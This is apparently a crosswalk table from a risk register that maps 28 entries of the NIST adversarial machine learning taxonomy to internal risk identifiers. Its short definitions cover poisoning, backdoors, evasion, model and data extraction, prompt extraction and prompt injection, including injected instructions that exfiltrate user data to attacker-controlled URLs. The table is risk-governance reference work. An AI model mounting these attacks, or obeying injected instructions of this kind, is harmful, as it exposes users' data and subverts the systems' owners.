DARR
Reverse crosswalk

NIST AI 100-2e2025 Adversarial ML

28 entries, 28 mapped to canonical risks. Each entry below is shown with the canonical risk it maps to, or the reason it sits outside the register.

Framework entryDescriptionDispositionRegister mappingConfidenceNote
NISTAML.01
Availability Violations
A disruption of the ability of other users or processes to obtain timely and reliable access to an AI system's outputs or functionality (availability breakdown).
MappedClearAvailability breakdown of the AI system is the register's general AI security weakness and availability-attack risk; denial of service and cost-harvesting are the MITRE ATLAS-anchored sub-risks.
NISTAML.02
Integrity Violations
An AI system being forced to misperform against its intended objectives, producing outputs or predictions that align with the attacker's objective.
MappedClearIntegrity violations are realised through evasion (MR-012), poisoning and backdoors (MR-014) and prompt injection (MR-010); the MITRE ATLAS integrity-erosion and trusted-output-manipulation sub-risks apply.
NISTAML.03
Privacy Compromises
The unauthorized access of restricted or proprietary information that is part of an AI system, including information about a model's training data, weights or architecture, or sensitive information that the model accesses (e.g. a RAG knowledge base).
MappedClearPrivacy compromise spans privacy-invasive inference (MR-017), leakage of personal or sensitive data (MR-009) and model or data extraction (MR-016).
NISTAML.04
Misuse Violations
Misuse enablement: a circumvention of technical restrictions imposed by the AI system's owner on its use, such as restrictions designed to prevent a GenAI system from producing outputs that could cause harm to others.
MappedClearMisuse enablement (circumventing owner-imposed safety restrictions, e.g. jailbreaks) maps to misuse or repurposing (MR-032) achieved via guardrail bypass (MR-010.2).
NISTAML.05
Supply Chain Attacks
Attacks that compromise components introduced through the AI supply chain, such as poisoned third-party data or a poisoned model published to a repository.
MappedClearSupply-chain attacks that introduce poisoned data or models map to the AI supply-chain risk (MR-018) and to data and model poisoning (MR-014).
NISTAML.011
Model Poisoning (availability)
A poisoning attack which operates through model control (the attacker can modify the trained model parameters), here aimed at degrading availability.
MappedClearModel poisoning through model control is direct manipulation or backdoor insertion under data and model poisoning (MR-014).
NISTAML.012
Clean-label Poisoning
A poisoning attack in which the adversary controls training samples but cannot change their labels (the label-limit capability).
MappedClearClean-label poisoning is a training-data poisoning variant under MR-014.
NISTAML.013
Data Poisoning
A poisoning attack in which an adversary controls part of the training data.
MappedClearData poisoning is squarely MR-014, with MITRE ATLAS sub-risks for training-data poisoning and poisoned datasets published for ingestion.
NISTAML.014
Energy-latency
An attack that exploits the performance dependency on hardware and model optimizations to negate the effects of hardware optimizations, increase computational latency, increase hardware temperature, and massively increase the amount of energy consumed (e.g. sponge examples).
MappedClearEnergy-latency (sponge) attacks degrade availability and inflate compute cost, mapping to general AI availability attacks (MR-015), denial of service and denial of wallet.
NISTAML.015
Indirect Prompt Injection
A type of prompt injection executed through resource control (adversary-controlled external data the model ingests) rather than through user-provided input as in a direct prompt injection.
MappedClearIndirect prompt injection via adversary-controlled external data is the register's indirect prompt injection sub-risk (MR-010.9).
NISTAML.018
Prompt Injection
An attack which exploits the concatenation of untrusted input with a prompt constructed by a higher-trust party such as the application designer.
MappedClearPrompt injection is MR-010 directly, with the deployed-LLM prompt injection sub-risk (MR-010.1).
NISTAML.021
Clean-label Backdoor
A backdoor poisoning attack mounted without control over training-data labels (a clean-label variant of backdoor poisoning).
MappedClearClean-label backdoor is a backdoor-insertion variant under data and model poisoning (MR-014).
NISTAML.022
Evasion
Modifying test samples to create adversarial examples that the model misclassifies at inference time, without altering the model.
MappedClearEvasion via adversarial examples is the register's adversarial examples and evasion risk (MR-012).
NISTAML.023
Backdoor Poisoning
A poisoning attack that causes a model to perform an adversary-selected behaviour in response to inputs that follow a particular backdoor pattern.
MappedClearBackdoor poisoning maps to MR-014 with the direct model manipulation and backdoor insertion sub-risk.
NISTAML.024
Targeted Poisoning
A poisoning attack that changes the prediction on a small number of targeted samples.
MappedClearTargeted poisoning is a training-data poisoning variant under MR-014.
NISTAML.025
Black-box Evasion
An evasion attack mounted with only query access and no knowledge of the model's parameters or architecture (black-box setting).
MappedClearBlack-box evasion is an evasion attack under MR-012 conducted with query access only.
NISTAML.026
Model Poisoning (integrity)
A poisoning attack which operates through model control, here aimed at violating integrity (causing targeted misclassification or adversary-selected behaviour).
MappedClearModel poisoning for integrity maps to MR-014 (direct model manipulation and backdoor insertion).
NISTAML.027
Misaligned Outputs
Integrity attacks (often via indirect prompt injection) that cause a GenAI system to become untrustworthy and generate content that deviates from benign behaviour to align with the attacker's objectives (e.g. incorrect summaries, attacker-specified content, suppressed sources, hijacked agents).
MappedClearMisaligned outputs are produced via indirect prompt injection that manipulates trusted output (MR-010.4); the agent-hijack variant is MR-071.
NISTAML.031
Model Extraction
A type of privacy attack that extracts details of the model architecture and/or parameters.
MappedClearModel extraction is the register's model theft and extraction risk (MR-016), via the inference API or white-box access.
NISTAML.032
Reconstruction
Privacy attacks that reconstruct sensitive data in a model's training data from aggregate information (data reconstruction).
MappedPartialData reconstruction has no dedicated register risk; it is covered by leakage of sensitive data (MR-009) and privacy-invasive inference (MR-017).
NISTAML.033
Membership Inference
A data privacy attack to determine whether a data sample was part of the training set of a machine learning model.
MappedClearMembership inference is the register's privacy-invasive inference and re-identification risk (MR-017).
NISTAML.034
Property Inference
A data privacy attack that infers a global property about the training data of a machine learning model.
MappedClearProperty inference is a privacy-invasive inference attack under MR-017.
NISTAML.035
Prompt Extraction
An attack that tries to divulge the system prompt or other information in the context of a large language model that would normally be hidden from a user.
MappedClearPrompt extraction is system-prompt and instruction extraction (MR-013.2) under disclosure of confidential or proprietary information (MR-013).
NISTAML.036
Leaking information from user interactions
An indirect prompt injection that instructs a model to persuade the end user to reveal information, then exfiltrates it (e.g. by querying an attacker-controlled URL or via markdown image rendering).
MappedClearLeaking information from user interactions is prompt-induced leakage of sensitive data (MR-009.1) driven by indirect prompt injection (MR-010.9).
NISTAML.037
Training Data Attacks
Training-data extraction: the ability of an attacker to extract the training data of a generative model by prompting the model with specific inputs.
MappedClearTraining-data extraction surfaces memorized sensitive data, mapping to leakage of personal or sensitive data (MR-009).
NISTAML.038
Data Extraction
Extraction of memorized training data or other sensitive context from a generative model through crafted queries (information-extraction attacks).
MappedClearData extraction of memorized content maps to leakage of personal or sensitive data in outputs (MR-009).
NISTAML.039
Compromising connected resources
Prompt injection attacks that cause a GenAI system to leak or exfiltrate private information from the restricted resources it can access (e.g. an email client forwarding messages to an attacker inbox; querying an attacker-controlled URL with user data).
MappedClearCompromising connected resources uses injection to exfiltrate data from tools the model can reach, mapping to insecure tool/integration (MR-020) and data exfiltration through agent tool invocation (MR-071.6).
NISTAML.051
Model Poisoning (supply chain)
Publishing a poisoned model (or poisoned data) into the AI supply chain so that downstream users inherit adversary-controlled behaviour.
MappedClearSupply-chain model poisoning maps to the AI supply-chain risk (MR-018), poisoned models published to registries (MR-018.2) and data and model poisoning (MR-014).

Descriptions are each source framework's own text, where it provides one; long entries are clipped here.